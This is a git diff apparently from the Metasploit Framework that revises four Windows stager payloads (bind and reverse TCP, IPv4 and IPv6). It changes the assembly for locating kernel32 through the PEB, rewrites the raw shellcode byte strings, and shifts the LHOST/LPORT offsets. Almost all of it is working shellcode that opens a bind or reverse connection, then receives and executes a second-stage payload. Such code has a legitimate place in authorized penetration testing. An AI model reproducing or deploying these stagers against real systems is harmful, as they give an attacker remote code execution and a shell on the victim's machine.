diff --git a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm index 68d66bfc52..bb2ebfbb7d 100644 --- a/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm +++ b/external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm @@ -67,9 +67,10 @@ LKernel32Base: pop ecx mov ebx, [fs:ecx] mov ebx, [ebx + 0x0c] - mov ebx, [ebx + 0x1c] + mov ebx, [ebx + 0x14] mov ebx, [ebx] - mov ebx, [ebx + 0x08] + mov ebx, [ebx] + mov ebx, [ebx + 0x10] push ebx ; kernel32.dll base push dword 0xec0e4e8e ; LoadLibraryA diff --git a/external/source/shellcode/windows/stager_bind_tcp_nx.asm b/external/source/shellcode/windows/stager_bind_tcp_nx.asm index 07f0afff08..c0768b8921 100644 --- a/external/source/shellcode/windows/stager_bind_tcp_nx.asm +++ b/external/source/shellcode/windows/stager_bind_tcp_nx.asm @@ -67,9 +67,10 @@ LKernel32Base: pop ecx mov ebx, [fs:ecx] mov ebx, [ebx + 0x0c] - mov ebx, [ebx + 0x1c] + mov ebx, [ebx + 0x14] mov ebx, [ebx] - mov ebx, [ebx + 0x08] + mov ebx, [ebx] + mov ebx, [ebx + 0x10] push ebx ; kernel32.dll base push 0xec0e4e8e ; LoadLibraryA diff --git a/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm b/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm index 6cceded2be..3a4fd0e10c 100644 --- a/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm +++ b/external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm @@ -67,9 +67,10 @@ LKernel32Base: pop ecx mov ebx, [fs:ecx] mov ebx, [ebx + 0x0c] - mov ebx, [ebx + 0x1c] + mov ebx, [ebx + 0x14] mov ebx, [ebx] - mov ebx, [ebx + 0x08] + mov ebx, [ebx] + mov ebx, [ebx + 0x10] push ebx ; kernel32.dll base push dword 0xec0e4e8e ; LoadLibraryA diff --git a/external/source/shellcode/windows/stager_reverse_tcp_nx.asm b/external/source/shellcode/windows/stager_reverse_tcp_nx.asm index d876003e30..a735fae269 100644 --- a/external/source/shellcode/windows/stager_reverse_tcp_nx.asm +++ b/external/source/shellcode/windows/stager_reverse_tcp_nx.asm @@ -67,9 +67,10 @@ LKernel32Base: pop ecx mov ebx, [fs:ecx] mov ebx, [ebx + 0x0c] - mov ebx, [ebx + 0x1c] + mov ebx, [ebx + 0x14] mov ebx, [ebx] - mov ebx, [ebx + 0x08] + mov ebx, [ebx] + mov ebx, [ebx + 0x10] push ebx ; kernel32.dll base push 0xec0e4e8e ; LoadLibraryA diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index b0abb5973f..8e1aac28ed 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -38,7 +38,7 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 253+1, 'n' ], + 'LPORT' => [ 255+1, 'n' ], }, 'Payload' => "\xfc"+ @@ -48,22 +48,22 @@ module Metasploit3 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ - "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+ - "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ - "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ - "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ - "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+ - "\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+ - "\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+ - "\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+ - "\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+ - "\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+ - "\x00\x53\x57\xff\x55\x18\xff\xd3" + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+ + "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+ + "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00"+ + "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49"+ + "\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed"+ + "\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7"+ + "\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff"+ + "\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00"+ + "\xff\x55\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55"+ + "\x2c\x89\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff"+ + "\xff\x89\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55"+ + "\x28\x53\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06"+ + "\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00"+ + "\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3" } )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index 9869a0fa3d..a1a03b183c 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'Offsets' => { - 'LPORT' => [ 245, 'n' ], + 'LPORT' => [ 247, 'n' ], }, 'Payload' => "\xfc"+ @@ -44,22 +44,22 @@ module Metasploit3 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ - "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+ - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49"+ - "\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+ - "\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+ - "\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+ - "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"+ - "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"+ - "\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"+ - "\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55"+ - "\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff"+ - "\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18"+ - "\xff\xd3" + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+ + "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+ + "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00"+ + "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49"+ + "\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed"+ + "\xfc\x3b\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7"+ + "\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff"+ + "\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30"+ + "\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31"+ + "\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55"+ + "\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7"+ + "\xff\x55\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a"+ + "\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff"+ + "\x55\x18\xff\xd3" } )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index cbc275f5e2..bdf8d54682 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -39,9 +39,9 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 246+1, 'ADDR6' ], - 'LPORT' => [ 240+1, 'n' ], - 'SCOPEID' => [ 262+1, 'V' ] + 'LHOST' => [ 248+1, 'ADDR6' ], + 'LPORT' => [ 242+1, 'n' ], + 'SCOPEID' => [ 264+1, 'V' ] }, 'Payload' => "\xfc" + @@ -51,19 +51,20 @@ module Metasploit3 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ - "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+ - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+ - "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+ - "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+ - "\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+ - "\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+ - "\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+ - "\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+ - "\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+ - "\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3" + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+ + "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+ + "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00"+ + "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9"+ + "\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32"+ + "\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a"+ + "\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2"+ + "\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50"+ + "\x6a\x06\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00"+ + "\x17\x00\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00"+ + "\x02\x1b\x63\xff\xfe\x98\xbf\x36\x00\x00\x00\x00\x59\x6a\x1c\x51"+ + "\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56"+ + "\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff"+ + "\xd3" } )) register_options( @@ -72,4 +73,4 @@ module Metasploit3 ], self.class) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index 4499224d49..0884b914d6 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -34,8 +34,8 @@ module Metasploit3 { 'Offsets' => { - 'LHOST' => [ 231, 'ADDR' ], - 'LPORT' => [ 238, 'n' ], + 'LHOST' => [ 233, 'ADDR' ], + 'LPORT' => [ 240, 'n' ], }, 'Payload' => "\xfc" + @@ -45,20 +45,20 @@ module Metasploit3 "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ - "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+ - "\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+ - "\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+ - "\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+ - "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+ - "\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+ - "\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+ - "\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"+ - "\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"+ - "\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56"+ - "\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57"+ - "\xff\x55\x18\xff\xd3" + "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+ + "\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+ + "\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00"+ + "\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9"+ + "\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32"+ + "\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a"+ + "\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2"+ + "\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50"+ + "\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22"+ + "\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6"+ + "\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56"+ + "\x53\x57\xff\x55\x18\xff\xd3" } )) end -end \ No newline at end of file +end